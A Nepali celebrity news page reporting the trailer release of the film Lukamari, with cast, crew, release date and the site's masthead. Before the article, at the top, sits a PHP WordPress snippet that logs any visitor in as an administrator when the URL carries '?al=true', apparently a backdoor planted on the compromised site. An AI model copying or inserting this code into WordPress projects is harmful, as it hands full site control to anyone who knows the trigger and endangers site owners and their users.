// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); सौगात र कर्माको फरक गेटअपमा लुकामारी ट्रेलर सार्बजनिक | Celebrity Nepal

सौगात र कर्माको फरक गेटअपमा लुकामारी ट्रेलर सार्बजनिक


सेलिब्रेटी नेपाल काठमाडौँ
saugat-malla
श्री राम दाहाल निर्देशित चलचित्र लुकामारीको दुइ वटा गीत सार्बजनिक भए संगै नेपाली चलचित्र बजारमा चर्चामा रहेको छ लुकामारी । लुकामारीको ट्रेलर सार्बजनिक भएको छ। सार्बजनिक ट्रेलरमा नायक सौगात मल्ल र नायक कर्मा लाइ फरक रुपमा देख्न सकिन्छ । अबको प्रतिक्षित चलचित्र लुकामारी लाई सुरजमान सिंह भण्डारीले निर्माण गरेका हुन् । चलचित्र यहि असार १० गतेबाट प्रदर्शनमा आउने छ ।

सुशन प्रजापतिले खिचेको यस चलचित्रमा कोरियोग्राफी रेनशा वान्तवा राइले गरेकी छिन् । चलचित्रमा सौगात मल्ल, कर्मा, विक्रम सिंह, सुरविना कार्की, रीस्ता बस्नेत, कृष्णभक्त महर्जन, जेवी डीसी लगाएतका कलाकारको मुख्य भूमिका रहेको छ । चलचित्रमा निर्देशक श्रीराम दाहालकै कथा छ रहेको छ ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.